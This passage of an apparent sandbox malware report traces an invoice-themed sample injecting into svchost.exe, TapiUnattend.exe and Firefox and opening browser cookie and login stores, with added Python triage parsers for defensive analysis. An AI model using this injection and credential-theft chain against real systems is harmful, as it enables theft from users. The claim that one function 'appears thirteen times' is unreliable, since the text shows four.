            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C32FC8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C32FC8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C32FC8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C32FC8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2EFD8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00360B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00332622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0032083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003209D5 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00320C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
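Every `mov eax, dword ptr fs:[00000030h]` row above loads the Process Environment Block pointer from the 32-bit TEB. The row records that load and nothing else: it does not say which PEB field (BeingDebugged, NtGlobalFlag, the heap flags) the code injected into svchost.exe reads afterwards, and the same instruction occurs in ordinary runtime code, so a single hit is weak evidence. What the list does show is volume and spread, that is, how many distinct functions touch the PEB and how often. The API-chain rows for process 0 need the opposite caveat: IsDebuggerPresent next to SetUnhandledExceptionFilter and UnhandledExceptionFilter (with IsProcessorFeaturePresent and TerminateProcess around them) is the shape of the MSVC C runtime's abort and fail-fast path, so those hits are compiler runtime code rather than a bespoke debugger check. The Python below is an added triage helper, not part of the Joe Sandbox report: it parses rows copied from this section (a constructed subset is embedded, exactly as the HTML table renders to text), counts PEB loads per function and per destination register, and tags API chains that match the CRT pattern. The CRT heuristic and the sample subset are this example's own, so the counts it reports are the sample's, not the full report's.

```python
import re
from collections import Counter

# Rows copied from the report section above (a constructed subset). They are
# embedded exactly as the HTML table renders to text: the Source and Code
# function cells run together and the function id is repeated at the end.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]1_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]1_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00332622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00332622
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0032083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0032083F
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003209D5 SetUnhandledExceptionFilter,0_2_003209D5
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00320C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00320C21
"""

# One row: "Source: <path>Code function: <id> <detail><id>". The " | " cell
# separator and the trailing id are optional, so rows whose cells have been
# separated parse the same way.
ROW_RE = re.compile(
    r"^Source: (?P<source>.+?)(?: \| )?Code function: "
    r"(?P<func>\d+_\d+_[0-9A-F]{8}) (?P<detail>.+?)(?P=func)?$"
)
# fs:[30h] in a 32-bit process is TEB->ProcessEnvironmentBlock; the row shows
# only the PEB pointer being loaded, not which field is read from it.
PEB_LOAD_RE = re.compile(r"^mov (?P<reg>e[a-d]x|e[sd]i|e[bs]p), dword ptr fs:\[00000030h\]$")
# API-chain rows are comma-separated import names, trailing comma optional.
API_CHAIN_RE = re.compile(r"^\w+(?:,\w+)*,?$")
# The MSVC C runtime's abort/fail-fast path calls these three together
# (heuristic chosen for this example, not a rule from the report).
CRT_FAILFAST = {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            raise ValueError("unrecognised row: " + line)
        rows.append(m.groupdict())
    return rows


def summarize_peb_loads(rows):
    """Return (PEB loads per (source, function), PEB loads per register)."""
    per_func, per_reg = Counter(), Counter()
    for r in rows:
        m = PEB_LOAD_RE.match(r["detail"])
        if m:
            per_func[(r["source"], r["func"])] += 1
            per_reg[m["reg"]] += 1
    return per_func, per_reg


def api_chains(rows):
    """Map function id -> list of imported APIs, for the API-chain rows only."""
    return {r["func"]: [a for a in r["detail"].split(",") if a]
            for r in rows if API_CHAIN_RE.match(r["detail"])}


def looks_like_crt_failfast(chain):
    """IsDebuggerPresent beside the unhandled-exception-filter pair is the
    shape of the CRT abort path, not a bespoke anti-debug check."""
    return CRT_FAILFAST.issubset(chain)


def report(text):
    rows = parse_rows(text)
    per_func, per_reg = summarize_peb_loads(rows)
    lines = [f"{sum(per_func.values())} PEB pointer loads in {len(per_func)} functions; "
             f"registers: {dict(per_reg)}"]
    for (src, func), n in per_func.most_common(3):
        lines.append(f"  {func} in {src}: {n} loads")
    for func, chain in api_chains(rows).items():
        tag = "CRT fail-fast shape" if looks_like_crt_failfast(chain) else "other"
        lines.append(f"  {func}: {','.join(chain)} [{tag}]")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_ROWS))
```

Paste the whole section into `SAMPLE_ROWS` to get the real distribution; functions such as 1_2_03C429A0, which appears thirteen times above, stand out at once, while the process-0 chains drop into the CRT bucket.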

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\TapiUnattend.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: NULL target: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe protection: read write
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: NULL target: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Thread register set: target process: 7920
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Thread APC queued: target process: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 313A008
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00361201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00361201
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00342BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00342BA5
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0036B226 SendInput,keybd_event,0_2_0036B226
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_003822DA
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Process created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"
Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00360B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00360B62
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00361663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00361663
Source: PROFOMA INVOICE SHEET.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PROFOMA INVOICE SHEET.exe, bJWYsPIiPtg.exe, 00000005.00000000.2037508907.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150244405.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150488554.0000000000F30000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: bJWYsPIiPtg.exe, 00000005.00000000.2037508907.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150244405.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150488554.0000000000F30000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: bJWYsPIiPtg.exe, 00000005.00000000.2037508907.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150244405.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150488554.0000000000F30000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: bJWYsPIiPtg.exe, 00000005.00000000.2037508907.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150244405.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150488554.0000000000F30000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00320698 cpuid 0_2_00320698
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00378195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00378195
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0035D27A GetUserNameW,0_2_0035D27A
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0033BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0033BB6F
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003042DE
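The "Section loaded", "Thread APC queued", "Memory written" and "Process created" lines above are the raw evidence behind the report's injection signatures. The following script, an added triage example rather than anything from the Joe Sandbox report, parses lines in exactly that export format (the source path glued to the event name with no separator) and rebuilds the injection chain, lists the write+execute cross-process mappings, and flags the process creation whose command line names a different image than the one started. The input lines are constructed from the report's own paths; nothing else is assumed.

```python
"""Added triage example (not part of the Joe Sandbox report): rebuild the
injection chain from the report's own "Source: <process><Event>: <detail>"
lines. The export glues the source path to the event name with no separator
("...svchost.exeSection loaded: ..."), so the parser anchors on the known event
names instead of a delimiter. All paths below are the ones the report lists."""
import ntpath
import re
from collections import deque

EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?)"
    r"(?P<event>Section loaded|Thread APC queued|Thread register set|Memory written|Process created): "
    r"(?P<detail>.*?)(?:Jump to behavior)?$"
)
SECTION_RE = re.compile(r"^NULL target: (?P<target>.+?) protection: (?P<prot>.+)$")
PROC_RE = re.compile(r'^(?P<image>.+?) "(?P<cmdline>.*)"$')
TARGET_RE = re.compile(r"^target process: (?P<target>.+)$")
MEM_RE = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)$")
DETAIL_RE = {"Section loaded": SECTION_RE, "Process created": PROC_RE,
             "Memory written": MEM_RE, "Thread APC queued": TARGET_RE,
             "Thread register set": TARGET_RE}

SAMPLE = "C:\\Users\\user\\Desktop\\PROFOMA INVOICE SHEET.exe"
LOADER = "C:\\Program Files (x86)\\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\\bJWYsPIiPtg.exe"
SVCHOST = "C:\\Windows\\SysWOW64\\svchost.exe"
TAPI = "C:\\Windows\\SysWOW64\\TapiUnattend.exe"
FIREFOX = "C:\\Program Files\\Mozilla Firefox\\firefox.exe"
RWX = "execute and read and write"
# Constructed input: the report's injection lines, re-typed as Python strings.
REPORT_LINES = [
    f"Source: {SAMPLE}Section loaded: NULL target: {SVCHOST} protection: {RWX}Jump to behavior",
    f"Source: {SVCHOST}Section loaded: NULL target: {LOADER} protection: {RWX}Jump to behavior",
    f"Source: {SVCHOST}Section loaded: NULL target: {TAPI} protection: {RWX}Jump to behavior",
    f"Source: {TAPI}Section loaded: NULL target: {LOADER} protection: read writeJump to behavior",
    f"Source: {TAPI}Section loaded: NULL target: {LOADER} protection: {RWX}Jump to behavior",
    f"Source: {TAPI}Section loaded: NULL target: {FIREFOX} protection: read writeJump to behavior",
    f"Source: {TAPI}Section loaded: NULL target: {FIREFOX} protection: {RWX}Jump to behavior",
    f"Source: {TAPI}Thread register set: target process: 7920Jump to behavior",
    f"Source: {TAPI}Thread APC queued: target process: {LOADER}Jump to behavior",
    f"Source: {SAMPLE}Memory written: {SVCHOST} base: 313A008Jump to behavior",
    f'Source: {SAMPLE}Process created: {SVCHOST} "{SAMPLE}"Jump to behavior',
    f'Source: {LOADER}Process created: {TAPI} "{TAPI}"Jump to behavior',
    f'Source: {TAPI}Process created: {FIREFOX} "C:\\Program Files\\Mozilla Firefox\\Firefox.exe"Jump to behavior',
]


def parse_events(lines):
    """(source, event, target, extra) per parsable line; extra is the protection,
    the command line, or the write base, depending on the event."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        d = DETAIL_RE[m["event"]].match(m["detail"])
        if not d:
            continue
        g = d.groupdict()
        target = g.get("target") or g["image"]
        extra = g.get("prot") or g.get("cmdline") or g.get("base") or ""
        events.append((m["src"], m["event"], target, extra))
    return events


def name(path):
    return ntpath.basename(path)


def same_image(a, b):
    """Windows paths are case-insensitive; the report itself spells the same
    binary 'firefox.exe' and 'Firefox.exe'."""
    return name(a).lower() == name(b).lower()


def rwx_injections(events):
    """Cross-process mappings with write+execute protection: the 'write the
    payload, then run it' shape behind the report's injection signatures."""
    return sorted({(name(s), name(t)) for s, e, t, x in events
                   if e == "Section loaded" and "execute" in x and "write" in x
                   and not same_image(s, t)})


def hollowing_candidates(events):
    """Process creations whose command line names a different image than the
    one started (here svchost.exe launched with the sample's own path), a
    hollowing / argument-spoofing tell worth alerting on."""
    return [(name(s), name(t), name(x)) for s, e, t, x in events
            if e == "Process created" and not same_image(t, x)]


def process_chain(events, root):
    """Breadth-first walk over every cross-process edge, in report order."""
    edges = {}
    for s, e, t, _ in events:
        if not t.isdigit():                 # bare PIDs cannot be resolved from the text
            edges.setdefault(name(s).lower(), []).append(name(t))
    order, seen = [name(root)], {name(root).lower()}
    queue = deque(seen)
    while queue:
        for nxt in edges.get(queue.popleft(), []):
            if nxt.lower() not in seen:
                seen.add(nxt.lower())
                order.append(nxt)
                queue.append(nxt.lower())
    return order


if __name__ == "__main__":
    ev = parse_events(REPORT_LINES)
    print(" -> ".join(process_chain(ev, SAMPLE)))
    print("RWX mappings:", rwx_injections(ev))
    print("hollowing candidates:", hollowing_candidates(ev))
```

The chain it prints (sample, svchost.exe, the dropped loader, TapiUnattend.exe, firefox.exe) is the same one the report's behavior graph draws; the hollowing check fires only on the svchost.exe creation, because the Firefox launch differs from its command line only in letter case.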

            Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\TapiUnattend.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\TapiUnattend.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\TapiUnattend.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\TapiUnattend.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\TapiUnattend.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\TapiUnattend.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
